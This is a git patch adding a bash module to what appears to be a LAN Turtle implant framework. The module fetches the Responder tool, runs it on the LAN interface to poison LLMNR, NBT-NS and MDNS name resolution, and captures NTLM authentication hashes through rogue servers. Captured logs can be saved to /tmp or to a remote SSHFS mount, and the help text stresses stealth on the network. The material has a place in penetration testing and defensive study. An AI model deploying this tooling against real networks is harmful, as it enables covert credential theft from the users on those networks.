From d294178b9c23165c3e3af825fea25cef5b1d363e Mon Sep 17 00:00:00 2001 From: IMcPwn Date: Sat, 19 Sep 2015 10:09:34 -0400 Subject: [PATCH] New module responder Responder is an LLMNR, NBT-NS and MDNS poisoner, with built-in HTTP/SMB/MSSQL/FTP/LDAP rogue authentication server supporting NTLMv1/NTLMv2/LMv2, Extended Security NTLMSSP and Basic HTTP authentication. The program itself can be viewed here: https://github.com/SpiderLabs/Responder I have created a module that can use this program and save the logs to sshfs or tmp. --- modules/responder | 114 ++++++++++++++++++++++++++++++++++++++++++++++ 1 file changed, 114 insertions(+) create mode 100644 modules/responder diff --git a/modules/responder b/modules/responder new file mode 100644 index 0000000..af30907 --- /dev/null +++ b/modules/responder @@ -0,0 +1,114 @@ +#!/bin/bash /usr/lib/turtle/turtle_module +VERSION="1.0" +DESCRIPTION="Responder - LLMNR, NBT-NS and MDNS poisoner" +CONF=/tmp/responder.form +AUTHOR=IMcPwn + +: ${DIALOG_OK=0} +: ${DIALOG_CANCEL=1} +: ${DIALOG_HELP=2} +: ${DIALOG_EXTRA=3} +: ${DIALOG_ESC=255} + +function start { + if [ ! -s /usr/bin/git ]; then + opkg update && opkg install git + fi + + if [[ ! -d /etc/turtle/Responder || ! -s /etc/turtle/Responder/Responder.py ]]; then + rm -r /etc/turtle/Responder + git clone git://github.com/SpiderLabs/Responder /etc/turtle/Responder + fi + +if [ -s /etc/config/responder ]; + then + responder_log=$(uci get responder.log) + case $responder_log in + sshfs) + if pgrep sshfs > /dev/null; then + echo "SSHFS Running" + if [[ ! -L /etc/turtle/Responder/logs || ! -L /sshfs/Responder/logs ]]; then + rm -r /etc/turtle/Responder/logs + mkdir -p /sshfs/Responder/logs + ln -s /sshfs/Responder/logs /etc/turtle/Responder/logs + echo "python /etc/turtle/Responder/Responder.py -I br-lan" | at now + echo responder started and logs are being saved to /sshfs + fi + else + echo "SSHFS not running" + fi + ;; + tmp) + if [[ ! -L /etc/turtle/Responder/logs || ! -L /tmp/Responder/logs ]]; then + rm -r /etc/turtle/Responder/logs + mkdir -p /tmp/Responder/logs + ln -s /tmp/Responder/logs /etc/turtle/Responder/logs + echo "python /etc/turtle/Responder/Responder.py -I br-lan" | at now + echo responder started and logs are being saved to /tmp + fi + ;; + esac + else + echo "Responder not configured." + fi +} + +function stop { + kill $(ps | grep -w [/]etc/turtle/Responder/Responder.py | awk {'print $1'}) +} + +function status { + if ps | grep -w -q [/]etc/turtle/Responder/Responder.py; then echo "1"; else echo "0"; fi +} + +function configure { + if [ -s /etc/config/responder ] + then + responder_log=$(uci get responder.log) + else + touch /etc/config/responder + fi + + dialog --ok-label "Submit" \ + --help-button \ + --title "Responder Configuration" \ + --radiolist "\n\ +Responder is an LLMNR, NBT-NS and MDNS poisoner.\n\nNOTICE: The first time you run this module it may take a long time to load. Please let it finish.\n\nThe log files can be saved to SSHFS or /tmp.\n" 16 60 3\ + 1 "Save log to SSHFS if available." off\ + 2 "Save log to /tmp/" off\ + 2>$CONF + + return=$? + + case $return in + $DIALOG_OK) + LOG=$(cat $CONF) + case $LOG in + 1) + uci set responder.log="sshfs" + uci commit responder + ;; + 2) + uci set responder.log="tmp" + uci commit responder + ;; + esac + ;; + $DIALOG_CANCEL) + rm $CONF + clear + exit;; + $DIALOG_HELP) + dialog --title "Help" \ + --msgbox "\ +Responder an LLMNR, NBT-NS and MDNS poisoner. It will answer to specific NBT-NS (NetBIOS Name Service) queries based on their name suffix (see: http://support.microsoft.com/kb/163409).\n\ +By default, the tool will only answer to File Server Service request, which is for SMB.\n\n\ +The concept behind this is to target our answers, and be stealthier on the network. This also helps to ensure that we don't break legitimate NBT-NS behavior.\n\n\ +For more information, see: https://github.com/SpiderLabs/Responder\n\ +" 20 60 + configure + ;; + $DIALOG_ESC) + clear;; + esac +}